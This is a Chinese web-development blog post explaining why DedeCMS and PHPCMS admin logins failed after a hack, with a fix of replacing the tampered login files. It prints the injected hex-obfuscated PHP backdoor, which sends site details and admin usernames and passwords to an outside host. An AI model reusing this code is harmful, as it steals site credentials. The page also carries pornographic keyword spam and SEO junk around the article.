婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 網站建設 > 建站知識 > 織夢phpcms網站受攻擊,網站后臺登錄不進去解決

織夢phpcms網站受攻擊,網站后臺登錄不進去解決

POST TIME:2017-11-30 16:50

  之前發現一個服務器的所有網站都出現了后臺登陸不進去的情況,本來以為是服務器內存,cpu或者寬帶的原因,可是都很正常,為什么登陸不進去呢?不程序下載到本地就正常了,真奇怪,最終找了一天終于找到了,原來是登陸文件讓黑客給修改了,原來是登陸用戶名密碼讓轉碼成16進制數了,php解析不了,再本地系統有默認的這個編碼表,當然能解析了,所以正常;

  織夢網站:/include/userlogin.class.php

  Phpcms V9:/phpcms/modules/admin/index.php

  找個新文件替換下就可以了;

  如下是攻擊代碼:

  $sqlhost = "\x77\x77\x77\x2e\x74\x68\x69\x73\x64\x6f\x6f\x72\x2e\x63\x6f\x6d";

  $sqlself = "\x2f\x69\x6e\x2f\x61\x70\x69\x2e\x70\x68\x70";

  $sqlself .= "\x3f\x76\x61\x72\x3d\x64\x65\x64\x65\x26\x64\x61\x74\x61\x3d";

  $sqlself .= bin2hex($_SERVER["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"]).'|'.bin2hex($_SERVER["\x50\x48\x50\x5f\x53\x45\x4c\x46"]).'|';

  $sqlself .= bin2hex($username).'|'.bin2hex($userpwd);

  $sqlport = hexdec(50);

  if(function_exists("\x66\x73\x6f\x63\x6b\x6f\x70\x65\x6e")) {

  $sqlfp = @fsockopen ($sqlhost, $sqlport);

  @fputs ($sqlfp, "\x47\x45\x54\x20".$sqlself."\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\r\n\x48\x6f\x73\x74\x3a".$sqlhost."\r\n\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x43\x6c\x6f\x73\x65\r\n\r\n");

  @fclose ($sqlfp);

  } else {

  $context = array("\x68\x74\x74\x70" => array("\x6d\x65\x74\x68\x6f\x64" => "\x47\x45\x54","\x74\x69\x6d\x65\x6f\x75\x74" => 5));

  if(function_exists('stream_context_create')) { $stream = @stream_context_create ($context); }

  @file_get_contents ("\x68\x74\x74\x70\x3a\x2f\x2f".$sqlhost."\x3a".$sqlport.$sqlself, false, $stream);

  }



收縮
  • 微信客服
  • 微信二維碼
  • 電話咨詢

  • 400-1100-266
主站蜘蛛池模板: 凤翔县| 白山市| 藁城市| 嘉鱼县| 永城市| 城市| 电白县| 义马市| 玛曲县| 焦作市| 磐石市| 太和县| 云龙县| 罗山县| 酉阳| 麻城市| 独山县| 铜鼓县| 陇南市| 堆龙德庆县| 津市市| 温泉县| 疏附县| 镇安县| 河北省| 宜宾市| 夏津县| 蒲江县| 会东县| 房产| 文安县| 青田县| 辽阳县| 肥乡县| 昭平县| 德化县| 米易县| 信阳市| 永平县| 镶黄旗| 祁东县|